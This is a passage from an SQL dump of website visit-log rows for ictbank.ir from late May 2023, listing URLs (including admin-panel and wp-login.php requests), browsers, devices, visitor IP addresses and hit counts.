(33121,'2023-05-22','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(33122,'2023-05-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(33123,'2023-05-22','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.237.152.61','000',0,253,0),
(33124,'2023-05-22','https://ictbank.ir/productmatrix/admin/index.php?pid=products','Chrome','OS X','113.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,1,0),
(33125,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.214.106.65','000',0,2,0),
(33126,'2023-05-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(33127,'2023-05-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(33128,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','188.166.94.189','000',0,1,0),
(33129,'2023-05-22','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,2,0),
(33130,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','116.202.134.210','000',0,1,0),
(33131,'2023-05-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(33132,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(33133,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.93.40.145','000',0,1,0),
(33134,'2023-05-22','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','37.187.215.242','000',0,1,0),
(33135,'2023-05-22','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,6,0),
(33136,'2023-05-22','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.106','000',0,1,0),
(33137,'2023-05-22','https://ictbank.ir/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','35.203.252.1','000',0,5,0),
(33138,'2023-05-22','https://ictbank.ir/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','35.203.252.33','000',0,1,0),
(33139,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','35.203.251.205','000',0,1,0),
(33140,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','35.203.251.232','000',0,4,0),
(33141,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','67.0.0.0','desktop','Unknown','','35.203.252.8','000',0,3,0),
(33142,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','35.203.251.227','000',0,2,0),
(33143,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','35.203.251.226','000',0,2,0),
(33144,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','35.203.251.236','000',0,3,0),
(33145,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','68.0.0.0','desktop','Unknown','','35.203.251.233','000',0,5,0),
(33146,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','35.203.251.201','000',0,2,0),
(33147,'2023-05-22','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,1,0),
(33148,'2023-05-22','https://ictbank.ir/blog','Safari','OS X','Unknown','desktop','Macintosh','','91.197.235.172','000',0,5,0),
(33149,'2023-05-22','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.18.199','000',0,1,0),
(33150,'2023-05-23','https://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(33151,'2023-05-23','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.111.112','000',0,2,0),
(33152,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','75.0.0.0','desktop','Unknown','','111.7.100.27','000',0,1,0),
(33153,'2023-05-23','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.156','000',0,1,0),
(33154,'2023-05-23','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.169','000',0,1,0),
(33155,'2023-05-23','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.147','000',0,1,0),
(33156,'2023-05-23','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.164','000',0,1,0),
(33157,'2023-05-23','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,6,0),
(33158,'2023-05-23','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','45.12.253.198','000',0,1,0),
(33159,'2023-05-23','https://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.128.22','000',0,2,0),
(33160,'2023-05-23','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.186','000',0,1,0),
(33161,'2023-05-23','https://ictbank.ir/blog','Chrome','Android','112.0.0.0','mobile:smart','Unknown','','104.28.246.162','000',0,1,0),
(33162,'2023-05-23','https://ictbank.ir/blog/','Chrome','Android','112.0.0.0','mobile:smart','Unknown','','104.28.214.162','000',0,1,0),
(33163,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','178.208.160.89','000',0,10,0),
(33164,'2023-05-23','https://ictbank.ir/productmatrix/admin/index.php?pid=products','Chrome','OS X','113.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,96,0),
(33165,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(33166,'2023-05-23','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.133.59.249','000',0,2,0),
(33167,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','58.0.0.0','desktop','Unknown','','68.183.3.198','000',0,1,0),
(33168,'2023-05-23','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(33169,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','3.0.0.0','desktop','Unknown','','45.88.97.232','000',0,2,0),
(33170,'2023-05-23','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','38.110.46.2','000',0,2,0),
(33171,'2023-05-23','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','199.45.154.4','000',0,2,0),
(33172,'2023-05-23','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','199.45.155.4','000',0,2,0),
(33173,'2023-05-23','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','43.248.128.82','000',0,2,0),
(33174,'2023-05-23','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','171.67.71.144','000',0,2,0),
(33175,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(33176,'2023-05-23','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(33177,'2023-05-23','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.156.164.79','000',0,1,0),
(33178,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.133.50','000',0,1,0),
(33179,'2023-05-23','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(33180,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.93.134.244','000',0,1,0),
(33181,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','106.0.0.0','desktop','Unknown','','131.153.143.50','000',0,1,0),
(33182,'2023-05-23','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','141.98.6.47','000',0,2,0),
(33183,'2023-05-23','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','150.109.20.76','000',0,1,0),
(33184,'2023-05-23','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.83.81.210','000',0,1,0),
(33185,'2023-05-23','https://ictbank.ir/blog','Firefox','Windows','47.0','desktop','Unknown','','185.185.69.128','000',0,1,0),
(33186,'2023-05-23','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','203.150.228.102','000',0,1,0),
(33187,'2023-05-23','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','140.238.69.139','000',0,7,0),
(33188,'2023-05-23','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,4,0),
(33189,'2023-05-23','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','69.50.140.108','000',0,1,0),
(33190,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,1,0),
(33191,'2023-05-23','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(33192,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.211.182.118','000',0,1,0),
(33193,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','43.163.199.37','000',0,2,0),
(33194,'2023-05-23','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,1,0),
(33195,'2023-05-23','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(33196,'2023-05-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','212.224.98.109','000',0,1,0),
(33197,'2023-05-23','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.156.160.32','000',0,1,0),
(33198,'2023-05-23','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','152.231.98.184','000',0,1,0),
(33199,'2023-05-23','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(33200,'2023-05-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','154.0.163.178','000',0,1,0),
(33201,'2023-05-23','https://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.129.32','000',0,2,0),
(33202,'2023-05-23','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','62.210.115.126','000',0,1,0),
(33203,'2023-05-23','https://ictbank.ir/blog','Chrome','Android','58.0.0.0','mobile:smart','Moto X4','','196.240.126.154','000',0,1,0),
(33204,'2023-05-23','https://ictbank.ir/blog','Facebook','Android','Unknown','mobile:smart','One Touch Pixi 3 (5)','','196.245.9.154','000',0,1,0),
(33205,'2023-05-23','https://ictbank.ir/blog','Chrome','Android','58.0.0.0','mobile:smart','Moto X4','','185.94.189.14','000',0,1,0),
(33206,'2023-05-23','https://ictbank.ir/blog','Facebook','Android','Unknown','mobile:smart','One Touch Pixi 3 (5)','','37.120.193.14','000',0,1,0),
(33207,'2023-05-23','https://ictbank.ir/blog','Chrome','Windows','96.0.0.0','desktop','Unknown','','23.146.240.163','000',0,1,0),
(33208,'2023-05-24','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','93.90.193.208','000',0,1,0),
(33209,'2023-05-24','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(33210,'2023-05-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,4,0),
(33211,'2023-05-24','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','213.32.122.82','000',0,1,0),
(33212,'2023-05-24','https://ictbank.ir/blog','Safari','OS X','Unknown','desktop','Macintosh','','194.242.15.130','000',0,1,0),
(33213,'2023-05-24','https://ictbank.ir/blog','Firefox','Fedora','90.0','desktop','Unknown','','75.91.55.55','000',0,1,0),
(33214,'2023-05-24','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','125.212.220.189','000',0,14,0),
(33215,'2023-05-24','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','198.211.122.149','000',0,1,0),
(33216,'2023-05-24','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','68.178.145.237','000',0,1,0),
(33217,'2023-05-24','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.90','000',0,2,0),
(33218,'2023-05-24','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.14','000',0,1,0),
(33219,'2023-05-24','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','223.29.197.204','000',0,2,0),
(33220,'2023-05-24','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','85.208.185.233','000',0,2,0),
(33221,'2023-05-24','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','198.187.29.38','000',0,2,0),
(33222,'2023-05-24','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','167.71.234.202','000',0,2,0),
(33223,'2023-05-24','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','54.36.165.179','000',0,2,0),
(33224,'2023-05-24','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','45.79.79.201','000',0,1,0),
(33226,'2023-05-24','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','37.59.34.103','000',0,2,0),
(33227,'2023-05-24','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','86.111.247.23','000',0,1,0),
(33228,'2023-05-24','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','54.38.44.6','000',0,1,0),
(33229,'2023-05-24','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','104.239.144.212','000',0,2,0),
(33230,'2023-05-24','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','134.209.231.244','000',0,2,0),
(33231,'2023-05-24','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','68.178.226.170','000',0,1,0),
(33232,'2023-05-24','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','195.49.212.165','000',0,1,0),
(33233,'2023-05-24','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,1,0),
(33234,'2023-05-24','https://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(33235,'2023-05-24','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.169.175.26','000',0,1,0),
(33236,'2023-05-24','https://ictbank.ir/productmatrix/admin/index.php?pid=products','Chrome','OS X','113.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,231,0),
(33237,'2023-05-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,4,0),
(33238,'2023-05-24','https://ictbank.ir/productmatrix/admin/index.php?pid=relations','Chrome','OS X','113.0.0.0','desktop','Macintosh','','35.88.241.188','000',0,2,0),
(33239,'2023-05-24','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,1,0),
(33240,'2023-05-24','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','158.69.23.79','000',0,4,0),
(33241,'2023-05-24','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','192.64.4.17','000',0,4,0),
(33242,'2023-05-24','https://ictbank.ir/productmatrix/admin/popup.php?pid=reports.companies_brands.map','Chrome','Android','112.0.0.0','mobile:smart','Unknown','','104.28.246.162','000',0,3,0),
(33243,'2023-05-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,4,0),
(33244,'2023-05-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(33245,'2023-05-24','https://ictbank.ir/blog','Sogou Explorer','Windows','Unknown','desktop','Unknown','','118.190.205.168','000',0,2,0),
(33246,'2023-05-24','https://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','185.224.128.130','000',0,2,0),
(33247,'2023-05-24','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.32.217.137','000',0,2,0),
(33248,'2023-05-24','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(33249,'2023-05-24','https://ictbank.ir/productmatrix/admin/popup.php?pid=reports.companies_brands.map','Chrome','OS X','113.0.0.0','desktop','Macintosh','','86.107.159.237','000',0,25,0),
(33250,'2023-05-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(33251,'2023-05-24','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.132.51','000',0,1,0),
(33252,'2023-05-24','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','43.163.199.37','000',0,106,0),
(33253,'2023-05-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(33254,'2023-05-24','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.167.162.239','000',0,1,0),
(33255,'2023-05-24','https://ictbank.ir/productmatrix/admin/popup.php?pid=reports.companies_brands.map','Chrome','OS X','113.0.0.0','desktop','Macintosh','','188.210.80.250','000',0,10,0),
(33256,'2023-05-24','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','92.205.10.215','000',0,1,0),
(33257,'2023-05-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(33258,'2023-05-24','https://ictbank.ir/productmatrix/admin/index.php','Chrome','OS X','113.0.0.0','desktop','Macintosh','','5.238.192.237','000',0,5,0),
(33259,'2023-05-24','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Yandex Browser','Windows','22.0.0','desktop','Unknown','','27.34.104.41','000',0,2,0),
(33260,'2023-05-24','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,2,0),
(33261,'2023-05-24','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','129.226.220.12','000',0,1,0),
(33262,'2023-05-24','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(33263,'2023-05-24','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','95.188.110.33','000',0,1,0),
(33264,'2023-05-25','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','31.13.127.21','000',0,1,0),
(33265,'2023-05-25','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','66.220.149.119','000',0,1,0),
(33266,'2023-05-25','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','173.236.213.148','000',0,14,0),
(33267,'2023-05-25','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(33268,'2023-05-25','https://ictbank.ir/blog','Chrome','Windows','97.0.0.0','desktop','Unknown','','51.159.89.13','000',0,1,0),
(33269,'2023-05-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,6,0),
(33270,'2023-05-25','https://ictbank.ir/productmatrix/admin/popup.php?pid=reports.companies_brands.map','Chrome','OS X','113.0.0.0','desktop','Macintosh','','5.238.237.184','000',0,18,0),
(33271,'2023-05-25','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(33272,'2023-05-25','https://ictbank.ir/blog','Chrome','Windows','39.0.0.0','desktop','Unknown','','68.235.43.110','000',0,1,0),
(33273,'2023-05-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(33274,'2023-05-25','https://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(33275,'2023-05-25','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.237.149.8','000',0,143,0),
(33276,'2023-05-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,4,0),
(33277,'2023-05-25','https://ictbank.ir/blog','Firefox','Windows','47.0','desktop','Unknown','','185.185.69.128','000',0,1,0),
(33278,'2023-05-25','https://search.brave.com/','Chrome','Windows','113.0.0.0','desktop','Unknown','','46.99.19.253','000',0,4,0),
(33279,'2023-05-25','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(33280,'2023-05-25','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','134.122.2.132','000',0,1,0),
(33281,'2023-05-25','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(33282,'2023-05-25','https://www.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.154.169','000',0,1,0),
(33283,'2023-05-25','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','179.43.142.43','000',0,1,0),
(33284,'2023-05-25','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.149.156.171','000',0,2,0),
(33285,'2023-05-25','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.70.78','000',0,2,0),
(33286,'2023-05-25','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.208.59.106','000',0,1,0),
(33287,'2023-05-25','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','89.248.167.131','000',0,2,0),
(33288,'2023-05-25','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','88.99.166.151','000',0,1,0),
(33289,'2023-05-25','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','67.205.157.83','000',0,1,0),
(33290,'2023-05-25','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','162.243.31.236','000',0,1,0),
(33291,'2023-05-25','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','62.20.146.255','000',0,1,0),
(33292,'2023-05-25','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','198.71.235.88','000',0,2,0),
(33293,'2023-05-25','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','94.237.25.98','000',0,2,0),
(33294,'2023-05-25','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','188.165.223.112','000',0,1,0),
(33295,'2023-05-25','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','54.36.175.88','000',0,1,0),
(33296,'2023-05-25','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','119.45.38.194','000',0,1,0),
(33297,'2023-05-25','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','195.96.200.252','000',0,1,0),
(33298,'2023-05-25','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,2,0),
(33299,'2023-05-25','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','104.131.160.206','000',0,2,0),
(33300,'2023-05-25','https://www.design-arena.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.135.63','000',0,1,0),
(33301,'2023-05-25','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.153.101.148','000',0,1,0),
(33302,'2023-05-25','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','159.223.77.249','000',0,1,0),
(33303,'2023-05-25','https://www.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.138.76','000',0,1,0),
(33304,'2023-05-25','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','104.168.236.228','000',0,1,0),
(33305,'2023-05-25','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.7','000',0,2,0),
(33306,'2023-05-26','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,3,0),
(33307,'2023-05-26','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','199.45.155.4','000',0,1,0),
(33308,'2023-05-26','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','199.45.154.4','000',0,2,0),
(33311,'2023-05-26','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','38.110.46.2','000',0,1,0),
(33312,'2023-05-26','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','43.248.128.82','000',0,2,0),
(33313,'2023-05-26','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','171.67.71.144','000',0,2,0),
(33314,'2023-05-26','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,4,0),
(33315,'2023-05-26','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(33316,'2023-05-26','https://ictbank.ir/blog','Chrome','OS X','83.0.0.0','desktop','Macintosh','','54.197.75.159','000',0,3,0),
(33317,'2023-05-26','https://ictbank.ir/blog','Firefox','Windows','87.0','desktop','Unknown','','194.61.54.205','000',0,1,0),
(33318,'2023-05-26','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','51.159.89.13','000',0,1,0),
(33319,'2023-05-26','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,4,0),
(33320,'2023-05-26','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','101.32.141.39','000',0,1,0),
(33321,'2023-05-26','https://ictbank.ir/blog','Firefox','Windows','85.0','desktop','Unknown','','91.193.183.107','000',0,1,0),
(33322,'2023-05-26','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(33323,'2023-05-26','https://ictbank.ir/blog','Firefox','Windows','75.0','desktop','Unknown','','83.220.170.223','000',0,1,0),
(33324,'2023-05-26','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','101.32.141.172','000',0,1,0),
(33325,'2023-05-26','https://design-arena.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','93.159.230.87','000',0,1,0),
(33326,'2023-05-26','https://www.design-arena.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','77.74.177.119','000',0,2,0),
(33327,'2023-05-26','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(33328,'2023-05-26','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','172.176.75.89','000',0,4,0),
(33329,'2023-05-26','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,5,0),
(33330,'2023-05-26','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','149.28.123.206','000',0,1,0),
(33331,'2023-05-26','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(33332,'2023-05-26','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','188.166.94.189','000',0,1,0),
(33333,'2023-05-26','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','51.83.238.159','000',0,2,0),
(33334,'2023-05-26','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','43.154.73.87','000',0,1,0),
(33335,'2023-05-26','https://ictbank.ir/blog','Firefox','Windows','108.0','desktop','Unknown','','185.224.128.130','000',0,2,0),
(33336,'2023-05-26','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.18.242','000',0,1,0),
(33337,'2023-05-26','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(33338,'2023-05-26','https://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','83.166.242.10','000',0,9,0),
(33339,'2023-05-26','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(33340,'2023-05-26','https://l.instagram.com/','Instagram','iOS','271.0.0.0.0','mobile:smart','iPhone 11','','85.239.53.224','000',0,7,0),
